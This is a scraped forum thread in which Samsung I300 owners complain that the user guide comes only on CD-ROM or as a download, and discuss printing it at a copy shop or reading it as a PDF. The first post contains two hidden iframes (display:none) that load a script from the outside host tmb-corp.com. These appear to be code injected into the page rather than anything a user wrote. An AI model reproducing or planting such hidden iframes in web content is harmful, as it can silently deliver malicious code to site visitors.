+ Reply to Thread

Thread: I300 User Guide

Angry I300 User Guide

Maybe it's me? I am new here, and this may have come up previously, but does anyone else disagree with Samsungs decision to make the I300 User Guide available only on the enclosed CDROM and via a download from the web? Having to print out a 300+ page User Guide (to take on the road) seems a little ridiculous to me, after paying so much for the unit. I love this unit and I'm sure I'll get the hang of it soon, but it would be sooner if I could take the book with me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I understand your predicamnet my friend. Your concern has been voiced by others here. In all fairness, I see it as a wise business decision since most of the owners of this device have owned or still own similar to the I300.

...or at least similar to the operating system.

User Guide

I'm sure you're right noting that the CDROM thing was a business decision and that a lot of people are familiar with the operating system. However, I feel that to make the unit an absolute "no brainer", they should make as simple as possible for the masses to catch on to this great item. Maybe I'm being a little naive, but "simple is best" sells.

I agree with you friend. There have certainly been a few occassions where I would have liked an almanac to assist me with an inquiry. I don't disagree with their decision, since I don't feel the need too often. It would have been nice though.

smartphonecentral.com
    And at 4mb it's a bit much to load up on your phone to read with Acrobat...

--Jesse

Thumbs up THANKS!

I just wanted to say that, while I like the I300 very much, finding this Forum has made me like it even more. I'm going to take some time this weekend and catch up on some of the previous notes, comments, etc. THANKS!

I agree about the User Guide. My PC access is sporadic and limited, which is one reason I love my i300. A hard copy would be much more convenient. It's a lot easier to grab a book! Like when I'm lying in bed and think of something I'd like to look up.
    I'd be willing to pay somebody to print the whole thing out for me!
    GCraig

To: GCraig - I couldn't agree with you more! That's exactly the type of situation I was thinking about, while on the road. I ended up going to my local Staples store and had them print me a copy off of the CD ROM. Of course, it ended up costing me about $30!

Yeah, I figured it would be about that much. We're talking about a lot of ink and paper!
    Did you buy your phone at Staples, or will they do this for anybody?
    GCraig

Actually, I'm happy to say, my Wife gave me the I300 for my Birthday! She purcahed it from Sprint PCS directly. I had it done at the Copy Center inside my local Staples. By the way, I sent messages to both Samsung USA & Samsung/Korea and they replied, but not really recognizing this as a "problem", in their eyes.

Administrator

Arrow

i dont se it as a problem. they are just keeping costs down..

you could get the adobe acrobat reader for plam and load it up there but it would cost you a lot of memory..

if you need to see it, you can always go to your pcs webpage ands look at it there in .pdf

~Kimberly

Lightbulb

well I printed mine out....300 duplexed pages (150 total pages) nicely archived in a 3-ring binder, easy to view, GREAT late nite reading.....

highest bidder?

Originally posted by Marctronixx
    i dont se it as a problem. they are just keeping costs down..
    Not to mention the number of trees saved...

There has always been a debate of softcopy vs hardcopy documentation. Each has its merits. Softcopy's include the ability to search, hyperlink, etc.

Administrator

Arrow

Originally posted by nchargreed
    well I printed mine out....300 duplexed pages (150 total pages) nicely archived in a 3-ring binder, easy to view, GREAT late nite reading.....

highest bidder?
    put it on ebay... with some pics...

I guess you're a little high tech to go to the library, huh?